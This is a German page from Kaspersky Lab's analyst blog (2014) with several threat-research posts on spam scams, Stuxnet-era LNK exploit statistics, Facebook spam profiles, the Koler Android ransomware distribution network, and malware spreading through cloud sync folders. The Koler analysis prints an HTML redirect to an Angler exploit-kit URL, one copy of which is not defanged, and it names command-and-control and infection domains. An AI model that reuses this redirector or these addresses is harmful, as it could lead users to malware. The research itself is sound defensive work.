Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2014  
Jan Feb Mär
Apr Mai Jun
Jul Aug  
     
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Organspende mit Lieferung frei Haus


  Tatyana Kulikova        6 August 2014 | 16:03  MSK

Ihr Kommentar  

Ein Liebesversprechen im Tausch gegen die Bezahlung der Reisekosten zum Wohnort des potentiellen Bräutigams ist ein weit verbreiteter Ansatz im betrügerischen Spam. Wesentlich seltenen trifft man in unerwünschten Mitteilungen auf „wohltätige“ Hilfsangebote, die sich dann aber als nicht wirklich kostenlos erweisen.


Ein gewisser Bewohner Odessas namens Alex erklärte in einer Mail, sich gegen eine nicht geringe Entlohnung als Organspender zu verdingen. In dem Schreiben informierte er den Empfänger über seinen Gesundheitszustand („nicht perfekt, aber sehr gut“), seine biometrischen Daten (Größe – 1,74 m, Gewicht – 63 kg) und sogar über seine Blutgruppe. Die Summe, für die der Mann aus Odessa bereit ist, eine Niere oder einen Teil seiner Leber herzugeben, wurde nicht genannt, aber die Hauptbedingung für die Organspende war, dass die Operation in einer europäischen Klinik durchgeführt würde.

Es ist komplett vorhersehbar, dass von Leuten, die auf diese Mitteilung reagieren und sich dazu entschließen, das überaus interessante Angebot anzunehmen, verlangt wird, dem potentiellen Spender eine nicht geringe Geldsumme vorzustrecken. Höchstwahrscheinlich wird der „Odessaner“ um einen Vorschuss auf die Reisekosten nach Europa bitten oder um Geld für die Durchführung zusätzlicher Analysen in qualifizierten Labors, und nach der Überweisung wird er zusammen mit dem erhaltenen Kapital verschwinden. Ehrlichkeit und Geschäfte, die aufgrund von Spam zustande kommen, sind zwei unvereinbare Dinge. Und man sollte erst recht überhaupt gar kein Risiko eingehen, indem man mit Betrügern in Verhandlungen tritt, wenn es dabei um die eigene Gesundheit oder das eigene Leben geht.


Das Stuxnet-Echo: Unerwartete Untersuchungsergebnisse zu Angriffen mit Hilfe von Exploits zu Microsoft-Produkten


   5 August 2014 | 14:00  MSK

Ihr Kommentar  

Wir bei Kaspersky Lab führen regelmäßig Untersuchungen zu einem konkreten Typ von Cyberbedrohungen durch. Zu Beginn dieses Jahres untersuchten wir eingehend die finanziellen Cyberbedrohungen, und Ende letzten Jahres analysierten wir vor dem Hintergrund des Auftauchens immer wieder neuer Sicherheitslücken in Java die Landschaft der Attacken auf die Anwender unserer Produkte, in denen Exploits zu Sicherheitslücken in der populären Software des Unternehmens Oracle zum Einsatz kamen.

In diesem Sommer haben wir einen Artikel mit dem Titel „Windows: Popularität und Sicherheitslücken“ vorbereitet, in dem wir herauszufinden versuchten, ob der Anteil der Anwender, die veraltete Windows-Versionen verwenden, groß ist oder nicht, und wie häufig die Nutzer mit Exploits unter Windows und anderen Microsoft-Produkten konfrontiert werden. Einige dieser Untersuchungsergebnisse erwiesen sich als völlig unerwartet.

Im Sommer 2010 ging die Kunde von der Existenz von Stuxnet um die Welt - einem Computerwurm, der - wie sich später herausstellte – eigens entwickelt wurde, um den Prozess der Urananreicherung in einigen Betrieben im Iran zu sabotieren. Stuxnet wurde zu einer wahren Bombe, die demonstrierte, was Malware in der Lage ist anzurichten, wenn ihr Ziel eng eingegrenzt ist und sie sorgfältig vorbereitet wird. Für die Verbreitung des Wurms wurde ein Exploit zu der Sicherheitslücke CVE-2010-2568 verwendet. Bei dieser Sicherheitslücke handelt es sich um einen Fehler in der Verarbeitung von Shortcuts im Betriebssystem Windows, der es ermöglicht, willkürliche dynamische Bibliotheken ohne Wissen des Anwenders zu laden. Die Schwachstelle betraf Windows XP, Vista, 7, sowie Windows Server 2003 und 2008.

Die ersten Schadprogramme, die diese Sicherheitslücke ausnutzten, wurden im Juli 2010 entdeckt. Unter anderem benutzte der Wurm Sality sie zur Verbreitung des eigenen Codes: Der Wurm generiert verwundbare Shortcuts und verbreitet sie innerhalb des lokalen Netzes. Der User muss nur einen Ordner öffnen, der einen solchen Shortcut enthält, und schon wird das bösartige Programm gestartet. Nach Sality und Stuxnet nutzten auch die bekannten Spionage-Programme Flame und Gauss diese Sicherheitslücke aus.

Microsoft gab ein Sicherheits-Update heraus, das die Schwachstelle noch im Herbst 2010 beseitigte. Ungeachtet dessen registrieren die Detektionssysteme von Kaspersky Lab bis zum heutigen Tag Dutzende Millionen Alarme aufgrund von Exploits, die die Sicherheitslücke CVE-2010-2568 ausnutzen. Tatsächlich wurden innerhalb des Untersuchungszeitraums 50 Millionen Alarme auf über 19 Millionen Computern weltweit registriert.

Überaus aussagekräftig ist auch die Verteilung der Betriebssysteme, auf denen die Alarme auf Exploits zu der LNK-Sicherheitslücke registriert wurden. Der Löwenanteil der Alarme (64,19%) entfiel in den letzten acht Monaten auf XP und nur 27,99% auf Windows 7. Die Produkte von Kaspersky Lab, die die Server-Betriebssysteme Windows Server 2003 und 2008 schützen, melden ebenfalls regelmäßig Detektionen von derartigen Exploits, und zwar 1,58% und 3,99% der Alarme respektive. Die große Zahl von Alarmen, die auf die Nutzer von XP entfallen, zeugt davon, dass auf den meisten dieser Computer entweder keine Schutzlösung installiert ist oder dass eine verwundbare Windows-Version verwendet wird – oder dass beides zutrifft. Die Alarme von den Server-Systemen sind ein Beleg für das Vorhandensein schädlicher Shortcuts in Netzverzeichnissen mit öffentlichem Zugriff, die die Sicherheitslücke CVE-2010-2568 ausnutzen.

Interessant ist auch die geografische Verteilung aller registrierten Alarme aufgrund der Sicherheitslücke CVE-2010-2568.


Geografische Verteilung der Alarme der Produkte von Kaspersky Lab auf Exploits für die Sicherheitslücke CVE-2010-2568 von November 2013 bis Juni 2014

Wie man sieht, sind Vietnam (42,45%), Indien (11,7%) und Algerien (5,52%) nicht nur führend, wenn es um den Nutzungsanteil des veralteten Betriebssystems XP geht, sondern sie liegen auch auf den ersten Plätzen nach Anzahl der Alarme der Schutzprodukte von Kaspersky Lab auf eine der gefährlichsten Sicherheitslücken in Windows, die zum gegenwärtigen Zeitpunkt bekannt ist. Bemerkenswert ist auch, dass den Daten derselben Untersuchung zufolge eben diese drei Länder nach Anteil der Nutzer des veralteten Betriebssystems Windows XP ebenfalls an der Spitze stehen.

Vietnam38.79%
China 27.35%
Indien 26.88%
Algerien24.25%
Italien20.31%
Spanien19.26%
Russische Föderation17.40%
Frankreich 12.04%
Deutschland8.54%
USA4.52%

TOP 10 der Länder mit dem größten Anteil an Anwendern von Windows XP an allen Windows-Anwendern

Es ist kein Wunder, dass die Attacken, die die Sicherheitslücke CVE-2010-2568 ausnutzen, bis heute so verbreitet sind. Die Tatsache, dass so viele Nutzer noch immer verwundbare Systeme verwenden, trägt dazu bei, dass die Exploits zu dieser Sicherheitslücke nach wie vor effektiv sind – und zwar selbst vier Jahre, nachdem ein Patch veröffentlicht wurde, das diese Schwachstelle beseitigt.

Alle weiteren Untersuchungsergebnisse und die vollständige Version des Berichts „Windows: Popularität und Sicherheitslücken“ finden Sie hier.

Spammende Facebook-Freunde aus der Nachbarschaft


  sortloff        1 August 2014 | 10:59  MSK

Ihr Kommentar  

Kürzlich stieß ich auf einige Spam-Ads auf Facebook, die auf den ersten Blick nichts Ungewöhnliches an sich hatten.

Spammer setzen gern auf Social-Engineering-Techniken – sie erstellen gefälschte Profile, treten beliebigen offenen (oder auch geschlossenen) Gruppen bei und teilen Links auf zwielichtige e-commerce-Sites oder betrügerische Umfragen, immer mit irgendwelchen einprägsamen Behauptungen, um die Leser dazu zu bringen, auf den angepriesenen Link zu klicken.

In diesem speziellen Fall liegen die Dinge ein bisschen anders. Die Spammer haben gefakte Profile mit einem netten Bild einer jungen Frau erstellt. Aber wenn man einen näheren Blick auf die Seite über „sie“ wirft, stellt man fest, dass die junge Dame in dem wunderschönen Örtchen Ernersdorf in Bayern lebt (der im Übrigen nicht weit entfernt von der deutschen Niederlassung von Kaspersky Lab liegt). Ich war davon ein wenig überrascht, denn Addison ist ein durchaus ungewöhnlicher Name für eine Person aus einem kleinen bayrischen Ort. Ihrem Profil zufolge ist sie außerdem eigentlich männlich und wurde im September 1978 geboren. Also habe ich mir das Ganze einmal genauer angeguckt.

Es scheint, als hätten die Spammer diesen bayrischen Ort aus strategischen Gründen ausgewählt und dann begonnen, Freundschaftsanfragen an verschiedene Leute aus der Region zu verschicken. Ich selbst stamme auch aus dieser Region, und einige meiner Freunde wurden erfolgreich dazu gebracht, die Freundschaftsanfrage anzunehmen.

Danach passierte mehrere Monate gar nichts. Vor ein paar Tagen begannen diese Spammer – nachdem sie sich einen gewissen Grad an Glaubwürdigkeit verschafft hatten – Fotos mit Werbung für Online-Shop für Sonnenbrillen einer bekannten Marke zu posten, wobei es sich höchstwahrscheinlich um gefälschte Artikel handelt. Um die Verbreitung der Werbebildchen effektiver zu gestalten, taggten die Spammer schließlich ihre „Freunde“ aus der Umgebung.

Wenn man verhindern möchte, dass andere Leute das eigene Profil benutzen, um alle Freunde mit dieser „Technik“ zuzuspammen, kann man die entsprechende Konfiguration bei Facebook bei den Anwendungseinstellungen vornehmen, so wie es getan habe.

Man sollte auch bedenken, dass man gar nicht unbedingt in diese Falle mit den „Freunden aus der Umgebung“ tappen muss, damit man selbst und die eigenen Freunde auf dieses Art zugespamt werden. Wenn Spammer auf irgendeine Weise die Account-Daten der tatsächlichen Freunde stehlen, kann dasselbe passieren wie im hier geschilderten Fall.


Ein Blick hinter das Verteilungsnetzwerk ‘AndroidOS.Koler’


  Global Research and Analysis Team of Kaspersky Lab       28 Juli 2014 | 10:28  MSK

Ihr Kommentar  

Anfang Mai 2014 erwähnte ein IT-Sicherheitsexperte namens Kaffeine erstmals den Schädling Trojan.AndroidOS.Koler.a, ein Erpresser-Programm, das den Bildschirm eines infizierten Gerätes blockiert und ein Lösegeld in Höhe von 100 bis 300 Dollar für die Entsperrung des Gerätes fordert. Es verschlüsselt keine Dateien oder blockiert - außer dem Bildschirm - keine anderen Funktionen auf dem Gerät.

Die Malware zeigt eine lokalisierte Nachricht der Polizei an!

Der Schädling hat maßgeschneiderte Nachrichten für die folgenden Länder zu bieten:

Australien
Belgien
Bolivien
Dänemark
Deutschland
Ecuador
Finnland
Frankreich
Großbritannien
Irland
Italien
Kanada
Lettland
Mexiko
Neuseeland
Niederlande
Norwegen
Österreich
Polen
Portugal
Rumänien
Schweden
Schweiz
Slowakei
Slowenien
Spanien
Tschechische Republik
Türkei
Ungarn
USA

Seit dem 23..Juli ist der mobile Teil der Kampagne unterbrochen und die Command- und Control-Server begannen “Uninstall”-Anfragen an die Opfer zu versenden.

In diesem Blogpost geht es weniger um die mobile Anwendung selbst – einige Details werden wir am Ende des Beitrags beleuchten – als vielmehr um seine Verteilungsinfrastruktur. Ein ganzes Netzwerk von schädlichen Pornosites, verbunden mit einem Traffic-Richtungssystem, das das Opfer auf verschiedene Payloads umleitet und dabei nicht nur mobile Geräte, sondern einfach jeden Besucher angreift. Eingeschlossen sind Umleitungen auf Browser-basierte Erpresserprogramme – Ransomware – und auf etwas, das wir für ein “Angler”-Exploit-Kit-Verteilungsnetzwerk halten.

Das unten stehende Diagramm zeichnet ein umfassenderes Bild der hier verwendeten Infrastruktur.

Die wichtigsten Untersuchungsergebnisse lassen sich folgendermaßen zusammenfassen:

  • Verteilung:        TDS (Traffic Distribution System)
  • Hauptkontroller:        video-sartex.us (TDS Controller)
  • Schädliche Porno-Websites (Redirector):        49 Domains gefunden
  • Exploit-Kit Websites:        700+ URLs (200+ Domains)
  • Browser-basierte Bildschirm-Sperrdomains:        49 Domains gefunden
  • Mobile Infektionsdomain:        video-porno-gratuit.eu
  • Mobil C2:        policemobile.biz.
  • Traffic:        Fast 200.000 Besucher der mobilen Infektionsdomain
  • 80% der Besucher stammen aus den USA

Die Nutzung eines Porno-Netzwerks für diese „Polizei“-Erpressersoftware ist kein Zufall: Die Opfer fühlen sich viel eher schuldig, wenn sie derartigen Content besuchen, und sie bezahlen daher auch eher die angeblich von den Behörden geforderte Strafe. Dieser psychologische Faktor kann den feinen Unterschied ausmachen zwischen einer gescheiterten und einer erfolgreichen Kampagne.

Unter Berücksichtigung der schädlichen mobilen Anwendung haben wir verschiedene APKs mit demselben Verhalten aufgespürt. Einige von ihnen (die noch nicht über dieses schädliche Netzwerk verbreitet werden) haben interessante Namen, wie z.B. PronHub.com.Apk, whatsapp.apk oder updateflash.apk.

Das verleitet zu der Annahme, dass die Angreifer ihre Kampagne in nächster Zukunft ausweiten könnten.

Verteilung der mobilen Payload

Die mobile Infektion wird ausgelöst, wenn der Nutzer bestimmte Porno-Sites mit einem Android-Gerät besucht. Diese Sites sind Teil eines Verteilungsnetzwerks, das eigens für diese Kampagne erstellt wurde und die Opfer zu einer Landing-Page umleitet, die eine APK-Datei mit der Bezeichnung animalporn.apk enthält.

Alle diese Porno-Sites in der Kampagne leiten ihren Traffic auf denselben Server um: hxxp://video-porno-gratuit.eu. Diese Domain hostet die schädliche APK.

Sobald der Nutzer die Website besucht, leitet sie ihn automatisch auf die schädliche App um. Der User muss dann den Download und die Installation der Anwendung auf seinem Gerät bestätigen.

Wir konnten Statistiken abrufen, die die geografische Verteilung dieser schädlichen Websites zeigen:

Gemäß denselben Statistiken begann die Kampagne und erreichte den Höhepunkt ihrer Aktivität im April 2014.

Redirectors: Das schädliche Porno-Netzwerk

Bei den pornografischen Sites des Netzwerks handelt es sich nicht um kompromittierte Sites. Sie sehen alle gleich aus, haben dieselbe HTML-Infrastruktur und stellen nicht ihr eigenes Porno-Material bereit.

Wir konnten insgesamt 48 Domains in diesem Porno-Umleitungsnetzwerk identifizieren.

Fast alle in dieser Infrastruktur benutzten Websites wurden unter Verwendung derselben Schablone erstellt – in vielen Fällen waren es Mustervorlagen von den legitimen Sites Tubewizardpro und Webloader für die externen Ressourcen.

Der gesamte Content (meist Videos und Bilder) auf diesen Pornosites wird mit Hilfe von Webloader von externen Quellen geladen.

Grundsätzlich leiten alle Porno-Sites auf die „Kontroll“-Domain videosartex.us um

Videosartex.us führt dann einen Redircet durch, der auf dem Parameter in der URL, dem Referrer, dem User-Agent und der geografischen Position der IP des Besuchers basiert.

Gehört die IP zu einem der 30 betroffenen Länder und der User-Agent gehört zu einem Android-Gerät, so wird der Besucher auf die APK bei video-porno-gratuit.eu umgeleitet.

In anderen Fällen wird der Nutzer entweder auf eine Porno-Site in dem Netzwerk, einen Bildschirmblockierer oder ein Exploit-Kit umgeleitet. Die Angreifer verwenden das Keitaro TDS (Traffic Distribution System) zur Umleitung der Anwender.

Nicht-mobile Payloads

Während unserer Analyse stellten wir fest, dass einige Domains nicht mobilen Opfern Ransomware-bezogene Pop-Ups anzeigen. Diese zusätzlichen Server werden benutzt, wenn der Kontroller (videosartex) eine der zwei folgenden Bedingungen feststellt:

  • Die Anfrage enthält keinen User-Agent des Internet Explorer.
  • Die Anfrage stammt aus einem der 30 betroffenen Länder, enthält jedoch keinen Android-User-Agent.

In diesem Fall wird das Opfer auf irgendeine der Browser-Ransomware-Websites weitergeleitet, während genau derselbe Sperrbildschirm wie im Fall von mobilen Geräten auf dem Computer des Opfers angezeigt wird. Es gibt in diesem Fall keine Infektion, lediglich ein Pop-up, das eine Sperrbild-Schablone anzeigt.

Die folgenden Bilder sind Beispiele für die Header, die in den Ransomware-Pop-ups benutzt werden:



Exploit-Kits

Die bei dieser Kampagne verwendete Umleitungsinfrastruktur beinhaltete eine finale Überraschung – sie leitet die Besucher, die den Internet Explorer verwenden, auf Sites, die das Angler-Exploit-Kit hosten, das Exploits für Silverlight, Adobe Flash und Java enthält.

Hier ein Beispiel für eine solche Umleitung:


<html>

<head>

<meta http-equiv="REFRESH" content="1; URL='hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php/'">

<script type="text/javascript">window.location = "http://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php";</script>

</head>

<body>

The Document has moved <a href="hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php">here</a>

</body>

</html>

Wir entdeckten über 200 Domains, die zur Unterbringung dieses Exploit-Kits benutzt werden.

Während unserer Analyse war der Exploit-Code nicht voll funktionsfähig und lieferte keinerlei Payload.

Fazit

Ransomware für mobile Geräte tauchte in fast jeder Prognose für das Jahr 2014 auf. Wir haben es hier nicht mit den raffiniertesten Schadfamilien zu tun, wie etwa Cryptolocker für Windows. Die Erpresserprogramme sind recht einfach gestrickt, allerdings reichen sie aus, um dem Opfer Verdruss zu bereiten.

Am interessantesten ist das Verteilungsnetzwerk, das in dieser Kampagne zum Einsatz kommt. Dutzende von automatisch generierten Websites leiten den Traffic zu einem zentralen Netzknoten, wo die Nutzer wieder umgeleitet werden. In Abhängigkeit von verschiedenen Bedingungen kann der zweite Redirect auf eine schädliche Android-Anwendung, zu einer Browser-basierten Ransomware oder zu einer Website mit dem Angler Exploit Kit führen.

Unserer Meinung nach zeigt diese Infrastruktur sehr deutlich, wie gut organisiert und gefährlich solche Kampagnen sind, die aktuell hauptsächlich - aber nicht ausschließlich - Android-User attackieren. Die Angreifer können dank vollständiger Automatisierung schnell ähnliche Infrastrukturen aufbauen, indem sie die Payload ändern oder andere Nutzer angreifen. Die Kriminellen haben zudem eine Reihe von Wegen gefunden, ihr Einkommen aus den Attacken in einem echten Multi-Geräte-Schema in Bares zu verwandeln.

Schwerlast-Trojaner mit Lieferung frei Haus


  Tatyana Kulikova       15 Juli 2014 | 16:05  MSK

Ihr Kommentar  

Gefälschte Mails, die im Namen bekannter Geschäfte verschickt werden, finden sich häufig im Spam-Traffic. In der Regel nutzen Cyberkriminellen zu solchen Zwecken die Namen von Online-Shops aus, doch es gibt auch Ausnahmen. Vor kurzem registrierten wir eine Versendung in (fehlerhafter) deutscher Sprache, in der der Empfänger aufgefordert wurde, eine ZIP-Datei zu öffnen, in der sich angeblich eine Rechnung und „andere wichtige Unterlagen“ von dem bekannten schwedischen Möbelhersteller IKEA befanden.

Allerdings verbargen sich im Archiv nicht die versprochenen Dokumente, sondern der Programm-Downloader Andromeda, der seinerseits den Schädling Trojan-PSW.Kegotip lud. Dieser Trojaner ist auf den Diebstahl persönlicher Informationen spezialisiert, unter anderem Logindaten und Passwörter.

Der aufmerksame Anwender kann problemlos ein gefaktes Schreiben von einer echten Benachrichtigung unterscheiden: Die faulen Spammer machten sich noch nicht einmal die Mühe, ihre Fälschung der Glaubwürdigkeit halber ein wenig auszustaffieren, z.B. mit dem Logo des Möbelhauses oder einer persönlichen Anrede, die typisch für IKEA ist.


Löcher im Schutz von Unternehmensnetzwerken: Cloud-Services


  Kirill Kruglov         9 Juli 2014 | 15:00  MSK

Ihr Kommentar  

Zu den am weitesten verbreiteten „Einsatzgebieten“ von Cloud-Services gehören: das Speichern von Scans des Reisepasses oder anderen persönlichen Dokumenten; die Synchronisierung von Datenbanken mit Passwörtern, Kontakten, Mails; das Erstellen von Websites; das Speichern von Quellcode-Versionen usw. Als der Cloud-Speicherdienst Dropbox öffentlich mitteilte, dass er eine Sicherheitslücke im Linkgenerator geschlossen habe, wurde im Internet wieder einmal eifrig darüber diskutiert, wie wichtig es ist, vertrauliche Daten zu verschlüsseln, bevor man sie auf irgendeiner Ressource ablegt - selbst wenn diese privat ist. Die Datenverschlüsselung (FLE) gewährleistet tatsächlich den Schutz vertraulicher Daten in der Cloud, selbst wenn Sicherheitslücken in der Kontrolle des Zugriffs auf Anwenderdokumente in dem einen oder anderen Cloud-Dienst entdeckt werden.

Es mag nun der Eindruck entstehen, dass man jedes Risiko vermeiden kann, wenn man entweder erst gar keine geheimen Daten in der Cloud ablegt oder diese verschlüsselt. Ist das tatsächlich so? Wie sich herausgestellt hat, nicht wirklich.

Im Internet findet man häufig Ratschläge zur „effizienten Nutzung von Filehosting-Diensten in der Cloud“, beispielsweise Anweisungen zur entfernten Steuerung des Computers, Beobachten des Computers während der eigenen Abwesenheit, Steuerung von torrent-Downloads und vieles mehr. Mit anderen Worten: Die Nutzer schaffen selbst alle nur erdenklichen Löcher, die auch von Trojanern, Würmern und vor allem Hackern mit Leichtigkeit ausgenutzt werden können, insbesondere wenn es um zielgerichtete Attacken geht.

Wir haben uns eine Frage gestellt: Wie groß ist das Risiko einer Infektion eines Unternehmensnetzwerks über einen Cloud-Service?

Auf der Black Hat 2013 referierte Jacob Williams, Chief Scientist der CSRgroup Computer Security Consultants, über die Nutzung von Dropbox zum Eindringen in ein Unternehmensnetzwerk. Im Laufe der Durchführung eines in Auftrag gegebenen Penetrationstests benutzte Jacob den zarten Dropbox-Client, der auf einem Notebook installiert war, das sich außerhalb des Unternehmensnetzwerks befand, um Schadsoftware auf Geräten innerhalb des Netzes zu verbreiten.

Zunächst infizierte Jacob mit Hilfe von Phishing das Notebook eines Mitarbeiters. Daraufhin schleuste er schädliche Skripte in Dokumente ein, die in einem „Cloud“-Ordner des Notebooks gespeichert waren. Dropbox aktualisierte die infizierten Dokumente automatisch auf allen Geräten, die mit dem Account des Anwenders in Verbindung standen (Synchronisation). Diesbezüglich steht Dropbox nicht allein da, denn die Funktion der automatischen Synchronisation ist in allen populären Anwendungen für den Zugriff auf Cloud-Filehosting-Dienste vorhanden, darunter Onedrive (alias Skydrive), Google Disk, Yandex Disk usw.

Wenn der Anwender das infizierte Dokument auf seinem Arbeitscomputer innerhalb des Unternehmensnetzwerks öffnete, installierten die in das Dokument eingeschleusten Skripte im System den Backdoor DropSmack, den Jacob speziell für diesen Pen-Test entwickelt hatte. Wie der Name vermuten lässt, besteht die Schlüsselfunktion von DropSmack in der Ausnutzung des Cloud-Dateispeichers Dropbox als Kanal zur Steuerung des Backdoors und zur Übermittlung von Unternehmensdokumenten durch die Unternehmens-Firewall hindurch nach draußen.






Jacob Williams‘ Experiment-Schema

Die Eindringungsmethode in das Unternehmensnetzwerk, die von Jacob im Rahmen des Pen-Tests eingesetzt wurde, überrascht durch ihre Einfachheit. Das ist wirklich eine eindeutige Lücke!

Wir wollten nun herausfinden, ob echte Cyberkriminelle tatsächlich Dropbox, OneDrive, Yandex Disk und Google Disk zur Verbreitung von Schadcode nutzen. Aufgrund der Informationen aus dem KSN über die Detektionen von Schädlingen, die in „Cloud“-Ordnern auf den Computern der Nutzer von Kaspersky Lab-Produkten gefunden wurden, stellten wir fest, dass solche Infektionen bei nur sehr wenigen Anwendern registriert wurden: Im Mai dieses Jahres hatten es lediglich 8.700 Personen mit einer Infektion eines „Cloud“-Ordners zu tun. Bei den Heimanwendern von Kaspersky Lab-Produkten machten die Schadprogramme dieser Art 0,42% aller Detektionen aus, bei den Anwendern von Unternehmensprodukten waren 0,24%.

Ein nicht ganz unwichtiges Detail sollte an dieser Stelle unbedingt erwähnt werden: Sobald der Schädling von einem Gerät in die Cloud gelangt ist, laden alle mit dem infizierten Account verbundenen Clients das Schadprogramm selbst auf ihr Gerät, und obendrein auch noch via HTTPS. Selbst wenn ein Antivirenprogramm den Befall auf einem der Geräte bemerkt und den Schädling direkt im Synchronisierungsordner löscht, so wird die Cloud-Anwendung – den Pflichten des Dienstes gemäß – gegen die sich abzeichnende Desynchronisierung angehen und den Schädling endlos aus der Cloud laden – wieder und wieder.

Unseren Daten zufolge gelangen in etwa 30% der Schadprogramme, die in Cloud-Ordnern auf Heimrechnern gefunden werden, über Synchronisierungsmechanismen auf die Computer! Bei Unternehmensanwendern liegt dieser Wert bei 50%. So führt der Mechanismus, den der Demonstrationsschädling von Jacob Williams verwendete, auch im wahren Leben zu Infektionen. Glücklicherweise haben wir bisher noch keine zielgerichtete Attacke unter Ausnutzung von Cloud-basierten Dateispeicherdiensten beobachten können.

Unter der schädlichen Software, die wir in den Cloud-Ordnern auf den Computern der Nutzer gefunden haben, herrschen Dateien der folgenden Formate vor: Win32, MSIL, VBS, PHP, JS, Excel, Word, Java. Erwähnenswert ist auch, dass zwischen Unternehmensanwendern und Heimanwendern ein kleiner Unterschied besteht: Bei den Erstgenannten finden sich häufiger infizierte MS Office-Dateien, bei den Letztgenannten sind es eher einmalige Schädlinge, und zwar bösartige Android-Apps.

TOP 10 der Schadprogramme:

 

HeimanwenderUnternehmensanwender
1Email-Worm.Win32.Runouce.bEmail-Worm.Win32.Brontok.dam.a
2Email-Worm.Win32.Brontok.qVirus.Win32.Sality.gen
3not-a-virus:AdWare.Win32.RivalGame.krVirus.Win32.Tenga.a
4Virus.Win32.Nimnul.aTrojan-Dropper.VBS.Agent.bp
5Trojan-Clicker.HTML.IFrame.agaTrojan.Win32.Agent.ada
6Exploit.Win32.CVE-2010-2568.genTrojan.Win32.MicroFake.ba
7Virus.Win32.Sality.genExploit.Win32.CVE-2010-2568.gen
8Worm.Win32.AutoRun.dtbvWorm.Win32.AutoRun.dtbv
9Trojan-Dropper.VBS.Agent.bpTrojan.Win32.Qhost.afes
10Trojan.Win32.Genome.vqzzVirus.Win32.Nimnul.a

Zumeist verwenden Virenautoren Cloud-Speicher gar nicht als Plattform zur Verbreitung, sondern vielmehr zum Hosting von Schadprogrammen – im Laufe unserer Untersuchungen sind wir nicht auf einen einzigen Wurm oder Backdoor gestoßen (DropSmack einmal ausgenommen), die es speziell auf Dateispeicher in der Cloud abgesehen hatten. Natürlich sind auch die Services selbst sehr bemüht, gegen Schadprogramme anzugehen, die einen freien Platz in der Cloud besetzen. Zudem wirkt sich das Hosting von Malware negativ auf den Ruf des Dienstes aus, auch wenn Cloud-Services rein formal keine Verantwortung dafür übernehmen, welche Dateien ihre Kunden in den Speicher laden. Offenbar verschlingt das Scannen aller in der Cloud befindlichen Dateien zu viele Ressourcen, die die Dienste gewinnbringender für die Speicherung von Daten nutzen können.

Die Untersuchung hat uns in erster Linie gezeigt, dass das Risiko einer Infektion über einen Cloud-Speicher relativ gering ist – im Laufe eines Jahres ist einer von eintausend Unternehmensanwendern, die Cloud-Services nutzen, einem Infektionsrisiko ausgesetzt. Man sollte allerdings bedenken, dass in manchen Fällen sogar eine einzige Infektion eines Computers in einem Unternehmensnetzwerk zu erheblichen Verlusten führen kann.

Mögliche Maßnahmen zum Schutz von Unternehmensnetzwerken:


  • Schrauben in der Firewall/IDS anziehen, den Zugriff auf die Server bekannter Services blockieren. Ein großer Nachteil dieses Ansatzes liegt in dem hohen Ressourcenverbrauch, denn man muss sorgfältig darauf achten, ob neue Kandidaten in der „Schwarzen Liste“ aufgetaucht sind.

  • Installation einer multifunktionalen Security Suite, die folgende Komponenten und Funktionen beinhaltet: heuristischer und verhaltensbasierter Antivirus, Zugriffsbeschränkung (HIPS), Kontrolle der Arbeit des Betriebssystems (System Watcher oder Hypervisor), Schutz vor Ausnutzung von Sicherheitslücken usw. Alle diese Features sollten dabei sorgfältig konfiguriert werden.

  • Da selbst eine moderne Security Suite mit allem Drum und Dran eine APT durchlassen kann, sollte man der Technologie „Anwendungskontrolle“ große Beachtung schenken (im Modus „Standardmäßig verboten“). Das ist wohl eins der zuverlässigsten Mittel, das das Blockieren jeder beliebigen unerwünschten Software ermöglicht (unter anderem solche, die im Rahmen von zielgerichteten Attacken verbreitet werden). Die komplexeste Aufgabe bei der Integration der Anwendungskontrolle besteht darin, die entsprechenden Regeln zu konfigurieren, damit alle erlaubten Anwendungen problemlos ausgeführt und aktualisiert werden. Zu diesem Zweck haben die Hersteller von Produkten mit der Funktion Anwendungskontrolle spezielle Tools entwickelt – Software-Updatefunktionen über vertrauenswürdige Aktualisierungsprogramme aus der Weißen Liste, inklusive alle möglichen System- und Anwendungsdateien, Zugriff auf die großen Cloud-Services und auf Informationsdatenbanken aller nur erdenklicher sauberer Software.

  • In besonderen Fällen muss die „Anwendungskontrolle“ benutzt werden, um die Verwendung von Cloud-Clients in Unternehmensnetzwerken einzuschränken, d.h. den Start von Synchronisierungsanwendungen von „Cloud“-Ordnern nur vertrauenswürdigen Mitarbeitern zu erlauben.

Und für die ganz und gar abgeschotteten Systeme, solchen etwa, die Elektrokraftwerke oder Wasserversorgungssysteme steuern oder den Start von Interkontinentalraketen ermöglichen – für Systeme dieser Art empfehlen wir eindringlich komplett von der Nutzung von Cloud-basierten Dateispeichern abzusehen.

Microsoft beschlagnahmt 22 NO-IP-Domains und durchkreuzt Malware-basierte APT-Operationen von Cyberkriminellen und Nationalstaaten


  Costin        1 Juli 2014 | 15:40  MSK

Ihr Kommentar  

